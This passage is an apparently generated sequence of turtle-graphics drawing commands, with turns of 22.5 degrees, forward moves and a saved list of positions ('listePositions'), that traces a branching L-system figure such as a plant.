listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,149.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,149.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,149.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,149.04)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((66.42,160.35), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,160.35)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((66.42,160.35), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,160.35)), setheading(45.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(22.5) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(0.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((89.86,141.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((89.86,141.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.18,153.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.18,153.13)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((117.18,153.13), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.18,153.13)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((117.18,153.13), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.18,153.13)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((131.96,159.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.96,159.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((131.96,159.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.96,159.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((143.27,170.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.27,170.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((143.27,170.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.27,170.57)), setheading(45.0) ;
pu(), setposition((101.18,153.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((107.30,167.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((107.30,167.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((118.61,179.23), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.61,179.23)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((118.61,179.23), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.61,179.23)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((133.39,185.35), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.39,185.35)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((133.39,185.35), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.39,185.35)), setheading(22.5) ;
pu(), setposition((101.18,153.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((107.30,167.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((107.30,167.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,182.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,182.69)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((128.20,188.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.20,188.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((128.20,188.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.20,188.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((139.52,200.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.52,200.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((139.52,200.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.52,200.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((145.64,214.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.64,214.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((145.64,214.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.64,214.91)), setheading(67.5) ;
pu(), setposition((113.42,182.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((113.42,198.69), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,198.69)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((113.42,198.69), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,198.69)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((119.54,213.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.54,213.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((119.54,213.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.54,213.48)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((130.86,224.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.86,224.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((130.86,224.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.86,224.79)), setheading(45.0) ;
pu(), setposition((113.42,182.69)), setheading(67.5) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(90.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(67.5) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,165.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,165.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,165.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,165.04)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,179.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,179.82)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((76.01,185.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,185.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((76.01,185.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,185.94)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((87.33,197.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,197.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((87.33,197.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,197.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((93.45,212.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,212.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((93.45,212.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,212.04)), setheading(67.5) ;
pu(), setposition((61.23,179.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((61.23,195.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,195.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((61.23,195.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,195.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((67.35,210.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
